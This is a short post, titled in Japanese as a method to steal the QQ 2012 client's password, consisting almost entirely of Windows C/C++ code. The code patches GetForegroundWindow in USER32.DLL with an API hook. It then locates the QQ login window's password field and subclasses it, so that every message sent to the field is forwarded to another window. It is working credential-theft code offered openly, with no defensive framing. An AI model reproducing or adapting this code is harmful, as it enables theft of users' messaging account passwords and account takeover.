QQ 2012クライアントのパスワードを盗む
1586 ワード
/*
* GetForegroundWindow , QQ , ; ,
*/
BOOL CalePatchAddr()
{
FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};
LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(CodeAddr, HookCode, 5);
ULONG oData;
VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;
memcpy(&NewCode[1], &off, 4);
memcpy(FuncAddr, NewCode, 5);
return TRUE;
}
WNDPROC pswd_proc = NULL;
HWND recv_hwnd = NULL;
//
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
SendMessage((HWND)recv_hwnd, message, wParam, lParam);
// , 。
return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
void InstallHook()
{
HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
if (QQ_hwnd == NULL)
{
AfxMessageBox(_T("QQ not found!"));
return;
}
HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0); //: MsgBox hwnd_qq_psw
if (pswd_hwnd == NULL)
{
AfxMessageBox(_T("pswd HWND not found!"));
return;
}
// ,
pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));
long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}